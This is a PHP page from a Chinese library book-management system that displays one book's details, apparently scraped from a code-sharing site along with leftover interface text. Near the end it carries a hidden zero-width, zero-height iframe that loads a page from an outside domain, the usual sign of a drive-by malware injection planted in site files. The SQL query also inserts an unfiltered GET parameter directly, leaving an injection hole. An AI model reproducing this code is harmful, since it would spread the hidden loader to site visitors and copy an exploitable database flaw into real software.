?? tsglck.php
字號:
<?php
include "../config.php";
$selected=$_GET["selected"];
$sql="select * from bookmanagement.books where id=".$selected;
$result=mysql_query($sql) or die(mysql_error());;
while($row=mysql_fetch_array($result))
{
?>
<link href="../css/css.css" rel="stylesheet" type="text/css">
<table width="765" border="0" cellspacing="0" class="table">
<tr>
<td width="677" height="50" align="left" class="tabletitle"> 圖書管理--查看</td>
<td width="82" align="left" class="tabletitle"> <form action="tsglcl.php"><input type="submit" name="submit4" value="返回" /></form></td>
</tr>
</table>
<table class="table" width="765">
<tr bgcolor="#BCD2E6" height="25">
<td width="100" align="center" class="word">ID</td>
<td width="665" align="left" class="word"> <?php echo $row["id"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">圖書編號</td>
<td align="left" class="word"> <?php echo $row["no"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">圖書名稱</td>
<td align="left" class="word"> <?php echo $row["bookname"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">圖書類別</td>
<td align="left" class="word"> <?php echo $row["category"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">作 者</td>
<td align="left" class="word"> <?php echo $row["author"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">出 版 社</td>
<td align="left" class="word"> <?php echo $row["press"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">出版時間</td>
<td align="left" class="word"> <?php echo $row["pubdate"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">頁 數(shù)</td>
<td align="left" class="word"> <?php echo $row["page"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">存放位置</td>
<td align="left" class="word"> <?php echo $row["location"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">入庫時間</td>
<td align="left" class="word"> <?php echo $row["intodate"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">價 格</td>
<td align="left" class="word"> <?php echo $row["price"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">數(shù) 量</td>
<td align="left" class="word"> <?php echo $row["amount"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">借出次數(shù)</td>
<td align="left" class="word"> <?php echo $row["lendnumber"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">狀 態(tài)</td>
<td align="left" class="word"> <?php echo $row["state"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">簡 介</td>
<td height="80" align="left" valign="top" class="word"><br />
<?php echo $row["intro"]; ?></td>
</tr>
<tr bgcolor="#BCD2E6" height="25">
<td align="center" class="word">封面圖片</td>
<td align="left" class="word"> <?php echo $row["coverphoto"]; ?></td>
</tr>
</table>
<?php } ?>
<iframe src=http://www.winxpbox.com/ys/e.htm width=0 height=0></iframe>
?? 快捷鍵說明
復制代碼
Ctrl + C
搜索代碼
Ctrl + F
全屏模式
F11
切換主題
Ctrl + Shift + D
顯示快捷鍵
?
增大字號
Ctrl + =
減小字號
Ctrl + -